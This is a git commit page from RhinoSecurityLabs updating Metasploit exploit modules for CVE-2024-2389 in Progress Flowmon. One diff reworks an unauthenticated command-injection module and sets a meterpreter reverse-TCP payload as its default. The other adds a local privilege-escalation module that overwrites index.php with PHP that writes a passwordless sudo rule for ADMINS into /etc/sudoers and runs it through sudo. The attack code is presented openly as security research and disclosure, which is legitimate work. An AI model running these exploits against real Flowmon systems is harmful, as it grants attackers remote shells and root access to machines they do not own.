Update msf modules

RhinoSecurityLabs · Apr 30, 2024 · 40548fa · 40548fa
1 parent 1f52533
commit 40548fa
Show file tree

Hide file tree

Showing 2 changed files with 82 additions and 22 deletions.
diff --git a/.../progress_flowmon_unauth_cmd_injection.rb → .../progress_flowmon_unauth_cmd_injection.rb b/.../progress_flowmon_unauth_cmd_injection.rb → .../progress_flowmon_unauth_cmd_injection.rb
@@ -26,28 +26,27 @@ def initialize(info = {})
             ['CVE', 'CVE-2024-2389'],
             ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability']
           ],
-          'DisclosureDate' => '2024',
+          'DisclosureDate' => '2024-04-23',
           'Notes' => {
             'Stability' => [ CRASH_SAFE ],
             'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
             'Reliability' => [ REPEATABLE_SESSION ]
           },
           'Platform' => ['unix', 'linux'],
-          'Arch' => [ARCH_X86, ARCH_X64],
+          'Arch' => [ARCH_CMD],
           'Targets' => [['Automatic', {}]],
           'Privileged' => false,
           'DefaultOptions' =>
           {
-            'PAYLOAD' => 'cmd/linux/https/x64/shell/reverse_tcp',
+            'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
             'SSL' => true,
             'RPORT' => 443
           },
         )
       )
 
       register_options([
-        OptString.new('TARGETURI', [true, 'The URI path to Flowmon', '/']),
-        OptBool.new('PRIVESC', [true, 'Automatically try privesc to add sudo entry', true])
+        OptString.new('TARGETURI', [true, 'The URI path to Flowmon', '/'])
       ])
     end
 
@@ -68,23 +67,6 @@ def exploit
       execute_command(payload.encoded)
     end
 
-    def on_new_session(session)
-      if datastore['PRIVESC']
-          execute_privesc_command(session)
-      else
-          print_status('Privilege escalation skipped.')
-      end
-    end
-
-    def execute_privesc_command(session)
-      print_status("Executing privilege escalation command...")
-      session.shell_command('cp /var/www/shtml/index.php /tmp/index.php.bak;')
-      session.shell_command('echo \'<?php system("echo \\"ADMINS ALL=(ALL) NOPASSWD: ALL\\" >> /etc/sudoers"); ?>\' > /var/www/shtml/index.php;')
-      session.shell_command('sudo /usr/bin/php /var/www/shtml/index.php Cli\\:AddNewSource s;')
-      session.shell_command('cp /tmp/index.php.bak /var/www/shtml/index.php;')
-      print_status('You should be able to use "sudo -i" for a root shell...')
-    end
-
     def check
       print_status("Checking if #{peer} can be exploited!")
 

diff --git a/CVE-2024-2389/metasploit/exploits/linux/local/progress_flowmon_sudo_privesc.rb b/CVE-2024-2389/metasploit/exploits/linux/local/progress_flowmon_sudo_privesc.rb
@@ -0,0 +1,78 @@
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+    Rank = ExcellentRanking
+
+    include Msf::Exploit::EXE
+    include Msf::Exploit::FileDropper
+    include Msf::Post::File
+
+    prepend Msf::Exploit::Remote::AutoCheck
+
+    def initialize(info = {})
+      super(
+        update_info(
+          info,
+          'Name' => 'Progress Flowmon Local sudo privilege escalation',
+          'Description' => %q{
+            This module abuses a feature of the sudo command on Progress Flowmon.
+            Certain binary files are allowed to automatically elevate
+            with the sudo command.  This is based off of the file name.  This
+            includes executing a PHP command with a specific file name. If the
+            file is overwritten with PHP code it can be used to elevate privileges
+            to root.
+          },
+          'Author' => [
+            'Dave Yesland with Rhino Security Labs',
+          ],
+          'License' => MSF_LICENSE,
+          'References' => [
+            ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/']
+            ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability']
+          ],
+          'DisclosureDate' => '2024-03-19',
+          'Notes' => {
+            'Stability' => [ CRASH_SAFE ],
+            'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          },
+          'SessionTypes' => ['shell', 'meterpreter'],
+          'Platform' => ['unix', 'linux'],
+          'Arch' => [ARCH_X86, ARCH_X64],
+          'Targets' => [['Automatic', {}]],
+          'Privileged' => true,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+          }
+        )
+      )
+    end
+
+    def check
+      score = 0
+      score += 1 if read_file('/var/www/shtml/index.php').include?('FlowMon')
+      score += 1 if read_file('/var/www/shtml/ui/manifest.json').include?('Flowmon Web Interface')
+      score += 1 if exists?('/var/www/shtml/translate.php')
+      vprint_status("Found #{score} indicators this is a Progress Flowmon product")
+      return CheckCode::Detected if score > 0
+
+      return CheckCode::Safe
+    end
+
+    def exploit
+
+      begin
+        vprint_status('Copying /var/www/shtml/index.php to /tmp/index.php.bak')
+        cmd_exec('cp /var/www/shtml/index.php /tmp/index.php.bak')
+        vprint_status('Overwriting /var/www/shtml/index.php with payload')
+        cmd_exec('echo \'<?php system("echo \\"ADMINS ALL=(ALL) NOPASSWD: ALL\\" >> /etc/sudoers"); ?>\' > /var/www/shtml/index.php;')
+        vprint_status('Executing sudo to elevate privileges')
+        cmd_exec('sudo /usr/bin/php /var/www/shtml/index.php Cli\\:AddNewSource s;')
+        vprint_status('Replacing index.php with original file')
+        cmd_exec('cp /tmp/index.php.bak /var/www/shtml/index.php')
+        vprint_status('You should be able to use "sudo -i" for a root shell...')
+      end
+    end
+  end